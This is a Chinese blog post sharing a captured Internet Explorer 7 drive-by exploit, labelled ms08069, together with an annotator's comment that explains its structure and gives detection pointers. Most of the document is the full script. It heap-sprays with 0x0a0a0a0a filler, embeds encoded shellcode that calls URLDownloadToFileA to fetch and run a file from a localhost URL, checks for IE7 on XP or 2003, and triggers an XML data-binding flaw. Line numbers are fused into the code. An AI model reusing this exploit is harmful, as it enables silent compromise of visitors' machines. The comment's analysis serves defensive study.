话说这个 ms08069 利用代码(exploit 网马)的代码,好像和夜火我昨天发的[IE7漏洞0day exploit](/blog/ie7-0day-exploit "ie7漏洞0day exploit")的代码差不多。对代码这一块,我也不是很懂,发出来也只是给大家看,我自己没什么能力研究哈~,大家自行辨认。
据说有人已经发出来了,俺也把俺昨天抓的那个发出来吧。
如何用就自己拿去研究好了,自己小解了一下。
<!--
  Captured drive-by sample, kept exactly as posted. The listing's gutter numbers
  (1, 2, 3 ...) and a "collapsed lines" widget label are fused into the text, so
  it does not parse as shown.

  Structure visible in the listing:
  * sleep(milliseconds): busy-wait loop that polls Date until the delay has
    elapsed or 1e7 iterations have run.
  * spray(sc): unescape()s the %u-encoded payload string, asks getSampleValue
    for a "%u0a0a%u0a0a" filler sized so that filler plus payload comes to
    heapBlockSize (0x100000) minus 0x38 bytes at 2 bytes per character, and
    stores filler+payload strings in the zzchuck array. The block count is
    (0x0a0a0a0a - 0x100000) / heapBlockSize, roughly 160 blocks. This is a
    heap-spray layout keyed to the value 0x0a0a0a0a.
  * getSampleValue(retVal, szlong): doubles the filler until it is long enough,
    then truncates it to szlong/2 characters.
  * Top level: calls spray, waits 2000 ms, then gates on MSIE version 7 and a
    "windows nt 5.1" / "windows nt 5.2" (XP / 2003) user agent before
    document.write-ing an XML data island (ID=I) that is bound through nested
    SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML elements. The trailing loop only
    rewrites window.status ten times.

  Payload note: the tail of the %u string decodes (16-bit little-endian units)
  to the ASCII strings "urlmon.dll", "URLDownloadToFileA", "..\v" and
  "http://localhost/calc.exe". That suggests a download-and-run stage pointed at
  a local test file; this was read from the string, not verified by execution.

  Detection pointers: long %uXXXX runs passed to unescape, about 1 MB string
  blocks built in a loop, random-looking identifier names, user-agent gating to
  IE7 on XP/2003, and nested SPAN elements bound to the same XML island with
  DATAFORMATAS=HTML.

  NOTE(review): the post labels this ms08069, while the author also says the
  code is nearly the same as the IE7 0day sample posted the day before; confirm
  which bulletin covers this data-binding trigger before reusing the label in
  signatures. The characters right after "SRC=http://" look mis-encoded in this
  copy, and the string literal is split across a line break.
-->
1<script>2function sleep(milliseconds)3{4var start=new Date().getTime();5for(var i=0;i<1e7;i++)6{7 if((new Date().getTime()-start)>milliseconds)8 {9 break10 }11}12}function spray(sc)13{14var bwkbnwvojsqweyvwgabdlie=0x0a0a0a0a;15var bwkbnwvojsqweyvwgabdlieyqfbygrgz=unescape;40 collapsed lines
16var asdfkj129312asdfasd=bwkbnwvojsqweyvwgabdlieyqfbygrgz(sc);17var heapBlockSize=0x100000;18var payLoadSize=asdfkj129312asdfasd.length*2;19var szlong=heapBlockSize-(payLoadSize+0x038);20var retVal=bwkbnwvojsqweyvwgabdlieyqfbygrgz("%u0a0a%u0a0a");21retVal=getSampleValue(retVal,szlong);22aaablk=(bwkbnwvojsqweyvwgabdlie-0x100000)/heapBlockSize;23zzchuck=new Array();24for(i=0;i<aaablk;i++)25{26 zzchuck[i]=retVal+asdfkj129312asdfasd27}28}29function getSampleValue(retVal,szlong)30{31while(retVal.length*2<szlong)32{33 retVal+=retVal34}retVal=retVal.substring(0,szlong/2);35return retVal36}var a1="%u";37spray("%u56e8%u0000%u5300%u5655%u8b57%u246c%u8b18%u3c45%u548b%u7805%uea01%u4a8b%u8b18%u205a%ueb01%u32e3%u8b49%u8b34%uee01%uff31%u31fc%uacc0%ue038%u0774%ucfc1%u010d%uebc7%u3bf2%u247c%u7514%u8be1%u245a%ueb01%u8b66%u4b0c%u5a8b%u011c%u8beb%u8b04%ue801%u02eb%uc031%u5e5f%u5b5d%u08c2%u5e00%u306a%u6459%u198b%u5b8b%u8b0c%u1c5b%u1b8b%u5b8b%u5308%u8e68%u0e4e%uffec%u89d6%u53c7%u8e68%u0e4e%uffec%uebd6%u5a50%uff52%u89d0%u52c2%u5352%uaa68%u0dfc%uff7c%u5ad6%u4deb%u5159%uff52%uebd0%u5a72%u5beb%u6a59%u6a00%u5100%u6a52%uff00%u53d0%ua068%uc9d5%uff4d%u5ad6%uff52%u53d0%u9868%u8afe%uff0e%uebd6%u5944%u006a%uff51%u53d0%u7e68%ue2d8%uff73%u6ad6%uff00%ue8d0%uffab%uffff%u7275%u6d6c%u6e6f%u642e%u6c6c%ue800%uffae%uffff%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%ue800%uffa0%uffff%u2e2e%u765c%ue800%uffb7%uffff%u2e2e%u765c%ue800%uff89%uffff%u7468%u7074%u2f3a%u6c2f%u636f%u6c61%u6f68%u7473%u632f%u6c61%u2e63%u7865%u0065");38sleep(2000);39nav=navigator.userAgent.toLowerCase();40if(navigator.appVersion.indexOf('MSIE')!=-1)41{42version=parseFloat(navigator.appVersion.split('MSIE')[1])43}if(version==7)44{45w2k3=((nav.indexOf('windows nt 5.2')!=-1)||(nav.indexOf('windows 2003')!=-1));46wxp=((nav.indexOf('windows nt 5.1')!=-1)||(nav.indexOf('windows xp')!=-1));47if(wxp||w2k3)document.write('<XML ID=I><X><C><![CDATA[<image SRC=http://þਊr.test.net 
src=http://www.google.com]]><![CDATA[>]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>');48var i=1;49while(i<=10)50{51 window.status=" ";52 i++53}54}55</script>